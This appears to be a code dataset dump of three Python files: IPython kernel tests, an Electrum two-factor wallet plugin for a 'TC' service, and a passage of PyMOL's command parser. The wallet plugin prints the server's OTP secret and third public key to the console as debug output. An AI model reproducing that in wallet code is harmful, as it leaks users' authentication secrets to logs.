source
stringlengths 3
86
| python
stringlengths 75
1.04M
|
|---|---|
test_kernel.py
|
"""test the IPython Kernel"""
#-------------------------------------------------------------------------------
# Copyright (C) 2013 The IPython Development Team
#
# Distributed under the terms of the BSD License. The full license is in
# the file COPYING, distributed as part of this software.
#-------------------------------------------------------------------------------
#-------------------------------------------------------------------------------
# Imports
#-------------------------------------------------------------------------------
import sys
import nose.tools as nt
from IPython.testing import decorators as dec, tools as tt
from IPython.utils import py3compat
from .utils import new_kernel, kernel, TIMEOUT, assemble_output, execute, flush_channels
#-------------------------------------------------------------------------------
# Tests
#-------------------------------------------------------------------------------
def _check_mp_mode(kc, expected=False, stream="stdout"):
execute(kc=kc, code="import sys")
flush_channels(kc)
msg_id, content = execute(kc=kc, code="print (sys.%s._check_mp_mode())" % stream)
stdout, stderr = assemble_output(kc.iopub_channel)
nt.assert_equal(eval(stdout.strip()), expected)
# printing tests
def test_simple_print():
"""simple print statement in kernel"""
with kernel() as kc:
iopub = kc.iopub_channel
msg_id, content = execute(kc=kc, code="print ('hi')")
stdout, stderr = assemble_output(iopub)
nt.assert_equal(stdout, 'hi\n')
nt.assert_equal(stderr, '')
_check_mp_mode(kc, expected=False)
@dec.knownfailureif(sys.platform == 'win32', "subprocess prints fail on Windows")
def test_subprocess_print():
"""printing from forked mp.Process"""
with new_kernel() as kc:
iopub = kc.iopub_channel
_check_mp_mode(kc, expected=False)
flush_channels(kc)
np = 5
code = '\n'.join([
"from __future__ import print_function",
"import multiprocessing as mp",
"pool = [mp.Process(target=print, args=('hello', i,)) for i in range(%i)]" % np,
"for p in pool: p.start()",
"for p in pool: p.join()"
])
expected = '\n'.join([
"hello %s" % i for i in range(np)
]) + '\n'
msg_id, content = execute(kc=kc, code=code)
stdout, stderr = assemble_output(iopub)
nt.assert_equal(stdout.count("hello"), np, stdout)
for n in range(np):
nt.assert_equal(stdout.count(str(n)), 1, stdout)
nt.assert_equal(stderr, '')
_check_mp_mode(kc, expected=False)
_check_mp_mode(kc, expected=False, stream="stderr")
def test_subprocess_noprint():
"""mp.Process without print doesn't trigger iostream mp_mode"""
with kernel() as kc:
iopub = kc.iopub_channel
np = 5
code = '\n'.join([
"import multiprocessing as mp",
"pool = [mp.Process(target=range, args=(i,)) for i in range(%i)]" % np,
"for p in pool: p.start()",
"for p in pool: p.join()"
])
msg_id, content = execute(kc=kc, code=code)
stdout, stderr = assemble_output(iopub)
nt.assert_equal(stdout, '')
nt.assert_equal(stderr, '')
_check_mp_mode(kc, expected=False)
_check_mp_mode(kc, expected=False, stream="stderr")
@dec.knownfailureif(sys.platform == 'win32', "subprocess prints fail on Windows")
def test_subprocess_error():
"""error in mp.Process doesn't crash"""
with new_kernel() as kc:
iopub = kc.iopub_channel
code = '\n'.join([
"import multiprocessing as mp",
"p = mp.Process(target=int, args=('hi',))",
"p.start()",
"p.join()",
])
msg_id, content = execute(kc=kc, code=code)
stdout, stderr = assemble_output(iopub)
nt.assert_equal(stdout, '')
nt.assert_true("ValueError" in stderr, stderr)
_check_mp_mode(kc, expected=False)
_check_mp_mode(kc, expected=False, stream="stderr")
# raw_input tests
def test_raw_input():
"""test [raw_]input"""
with kernel() as kc:
iopub = kc.iopub_channel
input_f = "input" if py3compat.PY3 else "raw_input"
theprompt = "prompt> "
code = 'print({input_f}("{theprompt}"))'.format(**locals())
msg_id = kc.execute(code, allow_stdin=True)
msg = kc.get_stdin_msg(block=True, timeout=TIMEOUT)
nt.assert_equal(msg['header']['msg_type'], u'input_request')
content = msg['content']
nt.assert_equal(content['prompt'], theprompt)
text = "some text"
kc.input(text)
reply = kc.get_shell_msg(block=True, timeout=TIMEOUT)
nt.assert_equal(reply['content']['status'], 'ok')
stdout, stderr = assemble_output(iopub)
nt.assert_equal(stdout, text + "\n")
@dec.skipif(py3compat.PY3)
def test_eval_input():
"""test input() on Python 2"""
with kernel() as kc:
iopub = kc.iopub_channel
input_f = "input" if py3compat.PY3 else "raw_input"
theprompt = "prompt> "
code = 'print(input("{theprompt}"))'.format(**locals())
msg_id = kc.execute(code, allow_stdin=True)
msg = kc.get_stdin_msg(block=True, timeout=TIMEOUT)
nt.assert_equal(msg['header']['msg_type'], u'input_request')
content = msg['content']
nt.assert_equal(content['prompt'], theprompt)
kc.input("1+1")
reply = kc.get_shell_msg(block=True, timeout=TIMEOUT)
nt.assert_equal(reply['content']['status'], 'ok')
stdout, stderr = assemble_output(iopub)
nt.assert_equal(stdout, "2\n")
def test_help_output():
"""ipython kernel --help-all works"""
tt.help_all_output_test('kernel')
|
tc_plugins.py
|
from .tc_wallet import Wallet_TC
from .tc_requests import tc_requests
from .tools import ErrorConnectingServer, TrustedCoinException, get_user_id, make_billing_address, Decrypt
import socket
from electrum import keystore
from electrum.bitcoin import TYPE_ADDRESS
from electrum.base_wizard import BaseWizard
from electrum.plugin import BasePlugin, hook
from electrum.i18n import _
from electrum.mnemonic import is_any_tc_seed_type, Mnemonic, seed_type
from electrum.bip32 import BIP32Node, xpub_type
from electrum.storage import STO_EV_USER_PW
DISCLAIMER = [
_("Two-factor authentication is a service provided by TC. "
"To use it, you must have a separate device with Google Authenticator."),
_("This service uses a multi-signature wallet, where you own 2 of 3 keys. "
"The third key is stored on a remote server that signs transactions on "
"your behalf. A small fee will be charged on each transaction that uses the "
"remote server."),
_("Note that your coins are not locked in this service. You may withdraw "
"your funds at any time and at no cost, without the remote server, by "
"using the 'restore wallet' option with your wallet seed."),
]
class TCPlugin(BasePlugin):
wallet_class = Wallet_TC
disclaimer_msg = DISCLAIMER
def __init__(self, parent, config, name):
BasePlugin.__init__(self, parent, config, name)
self.wallet_class.plugin = self
self.requesting = False
def is_available(self):
return True
def is_enabled(self):
return True
def can_user_disable(self):
return False
@hook
def tc_sign_wrapper(self, wallet, tx, on_success, on_failure):
if not isinstance(wallet, self.wallet_class):
return
if tx.is_complete():
return
if wallet.can_sign_without_server():
return
if not wallet.keystores['x3/'].get_tx_derivations(tx):
self.logger.info("twofactor: xpub3 not needed")
return
def wrapper(tx):
self.prompt_user_for_otp(wallet, tx, on_success, on_failure)
return wrapper
@hook
def get_tx_extra_fee(self, wallet, tx):
if type(wallet) != Wallet_TC:
return
for o in tx.outputs():
if o.type == TYPE_ADDRESS and wallet.is_billing_address(o.address):
return o.address, o.value
def finish_requesting(func):
def f(self, *args, **kwargs):
try:
return func(self, *args, **kwargs)
finally:
self.requesting = False
return f
@finish_requesting
def request_billing_info(self, wallet: 'Wallet_tc', *, suppress_connection_error=True):
if wallet.can_sign_without_server():
return
self.logger.info("request billing info")
try:
# todo wallet.get_user_id()[1] == short_id
# billing_info = tc_requests.get(wallet.get_user_id()[1])
# billing_info = {'billing_plan': 'electrum-per-tx-otp',
# 'billing_address': 'n3X7wpKn3GzyvxEsVV6LKz2fWQtgXQdzA2', 'network': 'testnet',
# 'tx_remaining': 20, 'billing_index': 1,
# 'billing_address_segwit': 'tb1q79dd94xk475vukt3h2d99gdsqgdk9cgaxzmlpz',
# 'price_per_tx': [[1, 50000], [20, 100000], [100, 250000]],
# 'id': '1e42f483163b15b696cb7021a586018beebc8c15f2f0c4db740095e27606d979'}
# 第一次收费时的参数
# billing_info = {'billing_plan': 'electrum-per-tx-otp',
# 'billing_address': 'mhArEhjwVxfLoRNU1S3UVRRQSaTLTsPGF1', 'network': 'testnet',
# 'tx_remaining': 0, 'billing_index': 0,
# 'billing_address_segwit': 'tb1qzg3wqfy45j44vvaj0k0xkr7rc0l64xj9k2avmg',
# 'price_per_tx': [[1, 50000], [20, 100000], [100, 250000]],
# 'id': '64acb16fa4e8ad05520e73e1d599fda5dba83a8024796bb69bf9ea90a0b55293'}
server_address = wallet.storage.get('server_address')
billing_info = tc_requests.get_billing(server_address, wallet.get_user_id()[1])
except ErrorConnectingServer as e:
if suppress_connection_error:
self.logger.info(str(e))
return
raise
billing_index = billing_info['billing_index']
# add segwit billing address; this will be used for actual billing
billing_address = make_billing_address(wallet, billing_index, addr_type='segwit')
if billing_address != billing_info['billing_address_segwit']:
raise Exception(f'unexpected trustedcoin billing address: '
f'calculated {billing_address}, received {billing_info["billing_address_segwit"]}')
wallet.add_new_billing_address(billing_index, billing_address, addr_type='segwit')
# also add legacy billing address; only used for detecting past payments in GUI
billing_address = make_billing_address(wallet, billing_index, addr_type='legacy')
wallet.add_new_billing_address(billing_index, billing_address, addr_type='legacy')
wallet.billing_info = billing_info
wallet.price_per_tx = dict(billing_info['price_per_tx'])
wallet.price_per_tx.pop(1, None)
return True
def start_request_thread(self, wallet):
from threading import Thread
if self.requesting is False:
self.requesting = True
t = Thread(target=self.request_billing_info, args=(wallet,))
t.setDaemon(True)
t.start()
return t
def make_seed(self, seed_type):
if not is_any_tc_seed_type(seed_type):
raise Exception(f'unexpected seed type: {seed_type}')
return Mnemonic('english').make_seed(seed_type=seed_type, num_bits=128)
@hook
def do_clear(self, window):
window.wallet.is_billing = False
def show_disclaimer(self, wizard: BaseWizard):
"""
声明
:param wizard:
:return:
"""
wizard.set_icon('tc.jpeg')
wizard.reset_stack()
wizard.confirm_dialog(title='Disclaimer', message='\n\n'.join(self.disclaimer_msg),
run_next=lambda x: wizard.run('choose_seed'))
@staticmethod
def is_valid_seed(seed):
t = seed_type(seed)
return is_any_tc_seed_type(t)
@hook
def get_action(self, storage):
if storage.get('wallet_type') != 'tc':
return
if not storage.get('x1/'):
# 展示协议
return self, 'show_disclaimer'
if not storage.get('x2/'):
return self, 'show_disclaimer'
if not storage.get('x3/'):
return self, 'accept_terms_of_use'
def choose_seed(self, wizard):
"""
选择种子
:param wizard:
:return:
"""
title = _('Create or restore')
message = _('Do you want to create a new seed, or to restore a wallet using an existing seed?')
choices = [
('choose_seed_type', _('Create a new seed')),
('restore_wallet', _('I already have a seed')),
]
wizard.choice_dialog(title=title, message=message, choices=choices, run_next=wizard.run)
def choose_seed_type(self, wizard):
choices = [
('create_tc_segwit_seed', _('Segwit TC')),
# ('create_tc_seed', _('Legacy TC')),
]
wizard.choose_seed_type(choices=choices)
def create_tc_segwit_seed(self, wizard):
self.create_seed(wizard, 'tc_segwit')
def create_tc_seed(self, wizard):
self.create_seed(wizard, 'tc')
def create_seed(self, wizard, seed_type):
seed = self.make_seed(seed_type)
f = lambda x: wizard.request_passphrase(seed, x)
wizard.show_seed_dialog(run_next=f, seed_text=seed)
def create_keystore(self, wizard, seed, passphrase):
xprv1, xpub1, xprv2, xpub2 = self.xkeys_from_seed(seed, passphrase)
# 创建钱包所需的公钥
k1 = keystore.from_xprv(xprv1)
k2 = keystore.from_xpub(xpub2)
wizard.request_password(run_next=lambda pw, encrypt: self.on_password(wizard, pw, encrypt, k1, k2))
# k1.update_password(None, '')
# wizard.data['x1/'] = k1.dump()
# wizard.data['x2/'] = k2.dump()
# wizard.pw_args = password, encrypt_storage, STO_EV_USER_PW
# self.go_online_dialog(wizard)
def on_password(self, wizard, password, encrypt_storage, k1, k2):
k1.update_password(None, password)
wizard.data['x1/'] = k1.dump()
wizard.data['x2/'] = k2.dump()
wizard.pw_args = password, encrypt_storage, STO_EV_USER_PW
self.go_online_dialog(wizard)
@classmethod
def xkeys_from_seed(self, seed, passphrase):
t = seed_type(seed)
if not is_any_tc_seed_type(t):
raise Exception(f'unexpected seed type: {t}')
words = seed.split()
n = len(words)
if n >= 20:
# note: pre-2.7 2fa seeds were typically 24-25 words, however they
# could probabilistically be arbitrarily shorter due to a bug. (see #3611)
# the probability of it being < 20 words is about 2^(-(256+12-19*11)) = 2^(-59)
if passphrase != '':
raise Exception('old 2fa seed cannot have passphrase')
xprv1, xpub1 = self.get_xkeys(' '.join(words[0:12]), t, '', "m/")
xprv2, xpub2 = self.get_xkeys(' '.join(words[12:]), t, '', "m/")
elif not t == 'tc' or n == 12:
xprv1, xpub1 = self.get_xkeys(seed, t, passphrase, "m/0'/")
xprv2, xpub2 = self.get_xkeys(seed, t, passphrase, "m/1'/")
else:
raise Exception('unrecognized seed length: {} words'.format(n))
return xprv1, xpub1, xprv2, xpub2
@classmethod
def get_xkeys(self, seed, t, passphrase, derivation):
assert is_any_tc_seed_type(t)
xtype = 'standard' if t == 'tc' else 'p2wsh'
bip32_seed = Mnemonic.mnemonic_to_seed(seed, passphrase)
rootnode = BIP32Node.from_rootseed(bip32_seed, xtype=xtype)
child_node = rootnode.subkey_at_private_derivation(derivation)
return child_node.to_xprv(), child_node.to_xpub()
@staticmethod
def is_valid_seed(seed):
t = seed_type(seed)
return is_any_tc_seed_type(t)
def create_remote_key(self, email, wizard):
"""
创建钱包1
:param email:
:param wizard:
:return:
"""
xpub1 = wizard.data['x1/']['xpub']
xpub2 = wizard.data['x2/']['xpub']
server_address = wizard.data['server_address']
type_of_service = wizard.data['type_of_service']
# Generate third key deterministically.
long_user_id, short_id = get_user_id(wizard.data)
# secret must be sent by the server
try:
# 创建钱包
r = tc_requests.create(server_address, xpub1, xpub2, email, type_of_service)
except (socket.error, ErrorConnectingServer):
wizard.show_message('Server not reachable, aborting')
wizard.terminate()
return
except TrustedCoinException as e:
wizard.show_message(str(e))
return
if r is None:
otp_secret = None
else:
otp_secret = r.get('otp_secret')
otp_secret = otp_secret[-5:] + otp_secret[:-5]
print('=======otp_secret======', otp_secret)
if not otp_secret:
wizard.show_message(_('Error'))
return
xpub3 = r.get('sat_xpub')
xpub3 = xpub3[-5:] + xpub3[:-5]
print('=======xpub3======', xpub3)
self.request_otp_dialog(wizard, short_id, otp_secret, xpub3)
def check_otp(self, wizard, short_id, otp_secret, xpub3, otp, reset):
if otp:
self.do_auth(wizard, short_id, otp, xpub3)
elif reset:
wizard.opt_bip39 = False
wizard.opt_ext = True
f = lambda seed, is_bip39, is_ext: wizard.run('on_reset_seed', short_id, seed, is_ext, xpub3)
wizard.restore_seed_dialog(run_next=f, test=self.is_valid_seed)
def do_auth(self, wizard, short_id, otp, xpub3):
try:
# 检查otp
server_address = wizard.data['server_address']
tc_requests.auth(server_address, short_id, otp)
except TrustedCoinException as e:
if e.status_code == 400: # invalid OTP
wizard.show_message(_(e.server_message))
# ask again for otp
self.request_otp_dialog(wizard, short_id, None, xpub3)
else:
wizard.show_message(str(e))
wizard.terminate()
except Exception as e:
wizard.show_message(str(e))
wizard.terminate()
else:
k3 = keystore.from_xpub(xpub3)
wizard.data['x3/'] = k3.dump()
wizard.data['use_trustedcoin'] = True
wizard.terminate()
def on_reset_seed(self, wizard, short_id, seed, is_ext, xpub3):
f = lambda passphrase: wizard.run('on_reset_auth', short_id, seed, passphrase, xpub3)
wizard.passphrase_dialog(run_next=f) if is_ext else f('')
def on_password(self, wizard, password, encrypt_storage, k1, k2):
k1.update_password(None, password)
wizard.data['x1/'] = k1.dump()
wizard.data['x2/'] = k2.dump()
wizard.pw_args = password, encrypt_storage, STO_EV_USER_PW
self.go_online_dialog(wizard)
def restore_wallet(self, wizard):
wizard.opt_bip39 = False
wizard.opt_ext = True
f = lambda seed, is_bip39, is_ext: wizard.run('on_restore_seed', seed, is_ext)
wizard.restore_seed_dialog(run_next=f, test=self.is_valid_seed)
def on_restore_seed(self, wizard, seed, is_ext):
f = lambda x: self.restore_choice(wizard, seed, x)
wizard.passphrase_dialog(run_next=f) if is_ext else f('')
def restore_choice(self, wizard: BaseWizard, seed, passphrase):
wizard.set_icon('tc.jpeg')
wizard.reset_stack()
title = _('Restore 2FA wallet')
msg = ' '.join([
'You are going to restore a wallet protected with two-factor authentication.',
'Do you want to keep using two-factor authentication with this wallet,',
'or do you want to disable it, and have two master private keys in your wallet?'
])
choices = [('keep', 'Keep'), ('disable', 'Disable')]
f = lambda x: self.on_choice(wizard, seed, passphrase, x)
wizard.choice_dialog(choices=choices, message=msg, title=title, run_next=f)
def on_choice(self, wizard, seed, passphrase, x):
if x == 'disable':
f = lambda pw, encrypt: wizard.run('on_restore_pw', seed, passphrase, pw, encrypt)
wizard.request_password(run_next=f)
else:
self.create_keystore(wizard, seed, passphrase)
# def on_restore_pw(self, wizard, seed, passphrase, password, encrypt_storage):
# xprv1, xpub1, xprv2, xpub2 = self.xkeys_from_seed(seed, passphrase)
# k1 = keystore.from_xprv(xprv1)
# k2 = keystore.from_xprv(xprv2)
# k1.add_seed(seed)
# k1.update_password(None, password)
# k2.update_password(None, password)
# wizard.data['x1/'] = k1.dump()
# wizard.data['x2/'] = k2.dump()
# long_user_id, short_id = get_user_id(wizard.data)
# xtype = xpub_type(xpub1)
# xpub3 = make_xpub(get_signing_xpub(xtype), long_user_id)
# k3 = keystore.from_xpub(xpub3)
# wizard.data['x3/'] = k3.dump()
# wizard.pw_args = password, encrypt_storage, STO_EV_USER_PW
# wizard.terminate()
# def on_reset_auth(self, wizard, short_id, seed, passphrase, xpub3):
# # todo 忘记OTP
# xprv1, xpub1, xprv2, xpub2 = self.xkeys_from_seed(seed, passphrase)
# if (wizard.data['x1/']['xpub'] != xpub1 or
# wizard.data['x2/']['xpub'] != xpub2):
# wizard.show_message(_('Incorrect seed'))
# return
# r = server.get_challenge(short_id)
# challenge = r.get('challenge')
# message = 'TRUSTEDCOIN CHALLENGE: ' + challenge
#
# def f(xprv):
# rootnode = BIP32Node.from_xkey(xprv)
# key = rootnode.subkey_at_private_derivation((0, 0)).eckey
# sig = key.sign_message(message, True)
# return base64.b64encode(sig).decode()
#
# signatures = [f(x) for x in [xprv1, xprv2]]
# r = server.reset_auth(short_id, challenge, signatures)
# new_secret = r.get('otp_secret')
# if not new_secret:
# wizard.show_message(_('Request rejected by server'))
# return
# self.request_otp_dialog(wizard, short_id, new_secret, xpub3)
|
parsing.py
|
#A* -------------------------------------------------------------------
#B* This file contains source code for the PyMOL computer program
#C* Copyright (c) Schrodinger, LLC.
#D* -------------------------------------------------------------------
#E* It is unlawful to modify or remove this copyright notice.
#F* -------------------------------------------------------------------
#G* Please see the accompanying LICENSE file for further information.
#H* -------------------------------------------------------------------
#I* Additional authors of this source file include:
#-*
#-*
#-*
#Z* -------------------------------------------------------------------
# parser2.py
# An improved command parser for PyMOL, but still a terrible kluuge
# PyMOL needs to migrate to a real parser soon!
# === Goals:
# 1. improved 1to1 mapping between pymol "cmd" API and command language
# 2. support for named arguments
# 3. support for calling arbitrary python functions via this mapping
# === Syntatic Examples
# * simple commands
# command
# * commands with arguments
#
# command value1
# command value1,value2
# command value1,value2,value3
# * commands with named arguments
#
# command argument1=value1
# command argument1=value1,argument2=value2,argument3=value3
# command argument3=value1,argument2=value2,argument1=value1
# * mixed...
#
# command value1,argument3=value3,arg
# * commands with legacy '=' support for first argument
#
# command string1=value1
# * which should map to
# command string1,value1
# * legacy '=' combined as above
#
# command string1=value1,value2
# command string1=value1,value2,value3,...
# command string1=value1,argument3=value3
# === Burdens placed on API functions...
#
# None. However, function must have real arguments for error checking.
#
from __future__ import absolute_import
# Don't import __future__.print_function
if True:
import re
import sys
import threading
import types
import inspect
from . import colorprinting
class QuietException(BaseException):
pass
# constants for keyword modes
SIMPLE = 0 # original pymol parsing (deprecated)
MOVIE = 1 # ignore ";", treat entire line as a single command
RUN = 2 # run command
SPAWN = 3 # for spawn and fork commands
ABORT = 4 # terminates command script
PYTHON = 5 # pass entire line to python
EMBED = 6 # embedded data
PYTHON_BLOCK = 7 # embedded python block
SKIP = 8 # skipping commands
NO_CHECK = 10 # no error checking
STRICT = 11 # strict name->argument checking
SECURE = 12 # command not available in "secure" mode
LEGACY = 13 # support legacy construct str1=val1,... -> str1,val1,...
LITERAL = 20 # argument is to be treated as a literal string
LITERAL1 = 21 # one regular argument, followed by literal string
LITERAL2 = 22 # two regular argument, followed by literal string
# key regular expressions
arg_name_re = re.compile(r"[A-Za-z0-9_]+\s*\=")
nester_char_re = re.compile(r"\(|\)|\[|\]")
nester_re = re.compile(r"[^,;]*[\(\[]")
arg_pre_nester_re = re.compile(r"([^,;\(\[]+)[\(\[]")
arg_post_nester_re = re.compile(r"[^,;\(\[]*")
arg_easy_nester_re = re.compile(r"\([^,]*\)|\[[^,]*\]")
arg_hard_nester_re = re.compile(r"\(.*\)|\[.*\]")
# NOTE '''sdf'sdfs''' doesn't work in below.
arg_value_re = re.compile(r"'''[^']*'''|'[^']*'|"+r'"[^"]*"|[^,;]+')
def trim_nester(st):
# utility routine, returns single instance of a nested string
# should be modified to handle quotes too
pc = 1
l = len(st)
c = 1
while c<l:
if st[c] in ('(','['):
pc = pc + 1
if st[c] in (')',']'):
pc = pc - 1
c = c + 1
if not pc:
break
if pc:
return None
return st[0:c]
def apply_arg(inp_arg,par=(),def_dict={}):
n_inp = len(inp_arg)
n_req = n_inp - len(def_dict)
result = []
inp_dict = {}
for a in inp_arg:
if a[0] != None:
inp_dict[a[0]] = a[1];
c = 0
for p in par:
if c<n_inp:
a = inp_arg[c]
if a[0] == None:
result.append(a[1])
c = c + 1
continue
if p in inp_dict:
result.append(inp_dict[p])
del inp_dict[p]
elif p in def_dict:
result.append(def_dict[p])
elif c<n_req:
raise QuietException("Error: invalid argument(s).")
c = c + 1
if len(inp_dict):
raise QuietException("Error: invalid argument(s).")
return result
def parse_arg(st,mode=STRICT,_self=None):
'''
parse_arg(st)
expects entire command to be passed in
returns list of tuples of strings: [(None,value),(name,value)...]
'''
result = []
# current character
cc = 0
a = st.split(None, 1)
if len(a) == 2:
st = a[1]
while 1:
if mode>=LITERAL: # LITERAL argument handling
if (mode-LITERAL)==len(result):
result.append((None, st[cc:].strip()))
return result
# clean whitespace
st = st.lstrip()
if st == '':
break
# read argument name, if any
mo = arg_name_re.match(st)
if mo:
nam = mo.group(0)[:-1].strip()
st = st[mo.end(0):].lstrip()
else:
nam = None
# is one or more nesters present?
skip_flag = 0
if nester_re.match(st[cc:]):
skip_flag = 1
nest_flag = 1
nest_str = ''
while nest_flag: # parse all the nesters
nest_flag = 0
# text before nester?
mo = arg_pre_nester_re.match(st[cc:])
if mo:
nest_str = nest_str + mo.group(1)
cc=cc+mo.end(1)
# special handling for nesters (selections, lists, tuples, etc.)
mo = arg_easy_nester_re.match(st[cc:]) # no internal commas
if mo:
cnt = len(nester_char_re.findall(mo.group(0)))
if cnt % 2 == 1: # make sure nesters are matched in count
mo = None
if mo:
nest_str = nest_str + mo.group(0)
cc=cc+mo.end(0)
# text after nester?
mo = arg_post_nester_re.match(st[cc:])
if mo:
post_nester = mo.group(0)
cc=cc+mo.end(0)
nest_str = nest_str + post_nester
nest_flag = 1 # one more cycle
else:
mo = arg_hard_nester_re.match(st[cc:])
if mo:
se = trim_nester(mo.group(0))
if se==None:
colorprinting.error("Error: "+st)
colorprinting.error("Error: "+" "*cc+"^ syntax error (type 1).")
raise QuietException
else:
cc = cc + len(se)
nest_str = nest_str + se
# text after nester?
mo = arg_post_nester_re.match(st[cc:])
if mo:
nest_str = nest_str + mo.group(0)
cc=cc+mo.end(0)
nest_flag = 1 # one more cycle
if not len(nest_str): # we must have failed to parse...
skip_flag = 0
else:
result.append((nam, nest_str.strip()))
if not skip_flag:
# no nester, so just read normal argument value
argval = None
mo = arg_value_re.match(st[cc:])
if not mo:
if(st[cc:cc+1]!=','):
colorprinting.error("Error: "+st)
colorprinting.error("Error: "+" "*cc+"^ syntax error (type 2).")
raise QuietException
else:
# allow blank arguments
result.append((nam,None))
else:
argval = mo.group(0)
cc=cc+mo.end(0)
while 1: # pickup unqouted characters after quotes
mo = arg_value_re.match(st[cc:])
if not mo:
break
argval = argval + mo.group(0)
cc=cc+mo.end(0)
if argval!=None:
result.append((nam, argval.strip()))
# clean whitespace
st = st[cc:].lstrip()
cc = 0
# skip over comma
if st != '':
if st.startswith(','):
st = st[1:].lstrip()
else:
colorprinting.error("Error: "+st)
colorprinting.error("Error: "+" "*cc+"^ syntax error (type 3).")
raise QuietException
if __name__!='__main__':
if _self._feedback(_self.fb_module.parser, _self.fb_mask.debugging):
_self.fb_debug.write(" parsing-DEBUG: tup: "+str(result)+"\n")
return result
def dump_str_list(list):
lst = list_to_str_list(list)
for a in lst:
print(a)
def list_to_str_list(list,width=77,margin=2): # format strings into a list
result = []
ll=len(list)
if ll>0:
mxln = 1
for a in list:
if len(a)>mxln:
mxln = len(a)
n_col = width//mxln
width = width - margin
while (n_col * mxln + n_col*2)>width:
n_col = n_col - 1
if n_col < 1:
n_col = 1
ll = len(list)
n_row = len(list)//n_col
while (n_row*n_col)<ll:
n_row = n_row + 1
rows = []
for a in range(n_row):
rows.append([])
row = 0
pad_list = []
for a in list:
pad_list.append(("%-"+str(mxln)+"s")%a)
for a in pad_list:
rows[row].append(a)
row = row + 1
if row >= n_row:
row = 0
for a in rows:
st = margin*' '
row = 0
st = st + ' '.join(a)
result.append(st)
return result
def dump_arg(name,arg_lst,nreq):
ac = 0
pc = 0
st = "Usage: "+name
if '_self' in arg_lst:
arg_lst = list(arg_lst)
arg_lst.remove('_self')
for a in arg_lst:
if ac>=nreq:
st = st + " ["
pc = pc + 1
if ac:
st = st + ", " + a
else:
st = st + " " + a
ac = ac + 1
print(st + " " + "]"*pc)
def prepare_call(fn,lst,mode=STRICT,name=None,_self=None): # returns tuple of arg,kw or excepts if error
if name==None:
name=fn.__name__
result = (None,None)
arg = []
kw = {}
co = fn.__code__
if (co.co_flags & 0xC): # disable error checking for *arg or **kw functions
mode = NO_CHECK
offset = 1 if inspect.ismethod(fn) else 0
arg_nam = co.co_varnames[offset:co.co_argcount]
narg = len(arg_nam)
if fn.__defaults__:
ndef = len(fn.__defaults__)
else:
ndef = 0
nreq = narg-ndef
if len(lst)==1:
if lst[0]==(None,'?'):
dump_arg(name,arg_nam,nreq)
raise QuietException
if mode==NO_CHECK:
# no error checking
for a in lst:
if a[0]==None:
arg.append(a[1])
else:
kw[a[0]]=a[1]
# set feedback argument (quiet), if extant, results enabled, and not overridden
if "quiet" in arg_nam:
if "quiet" not in kw:
if __name__!='__main__':
if _self._feedback(_self.fb_module.cmd, _self.fb_mask.results):
kw["quiet"] = 0
if "_self" not in kw: # always send _self in the dictionary
kw["_self"]=_self
else:
# error checking enabled
# build name dictionary, with required flag
arg_dct={}
c = 0
for a in arg_nam:
arg_dct[a]=c<nreq
c = c + 1
if mode==LEGACY:
# handle legacy string=value transformation
tmp_lst = []
for a in lst:
if(a[0]!=None):
if a[0] not in arg_dct:
tmp_lst.extend([(None,a[0]),(None,a[1])])
else:
tmp_lst.append(a)
else:
tmp_lst.append(a)
lst = tmp_lst
# make sure we don't have too many arguments
if len(lst)>narg:
if not narg:
colorprinting.error("Error: too many arguments for %s; None expected."%(name))
elif narg==nreq:
colorprinting.error("Error: too many arguments for %s; %d expected, %d found."%(
name,nreq,len(lst)))
dump_arg(name,arg_nam,nreq)
else:
colorprinting.error("Error: too many arguments for %s; %d to %d expected, %d found."%(
name,nreq,narg,len(lst)))
dump_arg(name,arg_nam,nreq)
raise QuietException
# match names to unnamed arguments to create argument dictionary
ac = 0
val_dct = {}
for a in lst:
if a[0]==None:
if ac>=narg:
raise QuietException("Parsing-Error: ambiguous argument: '"+str(a[1])+"'")
else:
val_dct[arg_nam[ac]]=a[1]
else:
val_dct[a[0]]=a[1]
ac = ac + 1
# now check to make sure we don't have any missing arguments
for a in arg_nam:
if arg_dct[a]:
if a not in val_dct:
raise QuietException("Parsing-Error: missing required argument in function %s : %s" % (name, a))
# return all arguments as keyword arguments
kw = val_dct
# set feedback argument (quiet), if extant, results enabled, and not overridden
if "quiet" in arg_dct:
if "quiet" not in kw:
if _self._feedback(_self.fb_module.cmd, _self.fb_mask.results):
kw["quiet"] = 0
# make sure command knows which PyMOL instance to message
if "_self" in arg_nam:
if "_self" not in kw:
kw["_self"]=_self
if __name__!='__main__':
if _self._feedback(_self.fb_module.parser, _self.fb_mask.debugging):
_self.fb_debug.write(" parsing-DEBUG: kw: "+str(kw)+"\n")
return (arg,kw)
# launching routines
def run(filename, namespace='global', _spawn=0, _self=None):
'''
DESCRIPTION
"run" executes an external Python script in a local name space,
the main Python namespace, the global PyMOL namespace, or in its
own namespace (as a module).
USAGE
run file [, namespace ]
ARGUMENTS
file = string: a Python program, typically ending in .py or .pym.
namespace = local, global, module, main, or private {default: global}
NOTES
Due to an idiosyncracy in Pickle, you can not pickle objects
directly created at the main level in a script run as "module",
(because the pickled object becomes dependent on that module).
Workaround: delegate construction to an imported module.
SEE ALSO
spawn
'''
from __main__ import __dict__ as ns_main
from pymol import __dict__ as ns_pymol
if not _self:
from pymol import cmd as _self
if filename.endswith('.pml'):
return _self.load(filename)
path = _self.exp_path(filename)
spawn = int(_spawn)
run_ = spawn_file if spawn else run_file
if namespace == 'global':
run_(path, ns_pymol, ns_pymol)
elif namespace == 'local':
run_(path, ns_pymol, {})
elif namespace == 'main':
run_(path, ns_main, ns_main)
elif namespace == 'private':
run_(path, ns_main, {})
elif namespace == 'module':
run_file_as_module(path, spawn=spawn)
else:
raise ValueError('invalid namespace "%s"' % namespace)
def spawn(filename, namespace='module', _self=None):
'''
DESCRIPTION
"spawn" launches a Python script in a new thread which will run
concurrently with the PyMOL interpreter. It can be run in its own
namespace (like a Python module, default), a local name space, or
in the global namespace.
USAGE
spawn file [, namespace ]
NOTES
The default namespace for spawn is "module".
The best way to spawn processes at startup is to use the -l option
(see "help launching").
SEE ALSO
run
'''
return run(filename, namespace, 1, _self)
def _print_exc():
colorprinting.print_exc([__file__])
def execfile(filename, global_ns, local_ns):
import pymol.internal as pi
co = compile(pi.file_read(filename), filename, 'exec')
exec(co, global_ns, local_ns)
def run_file(file,global_ns,local_ns):
global_ns['__script__'] = file
try:
execfile(file,global_ns,local_ns)
except pymol.CmdException:
# so the idea here is to print the traceback here and then
# cascade all the way back up to the interactive level
# without any further output
_print_exc()
raise QuietException
def run_file_as_module(file,spawn=0):
name = re.sub('[^A-Za-z0-9]','_',file)
if not isinstance(name, str):
# Python 2 only
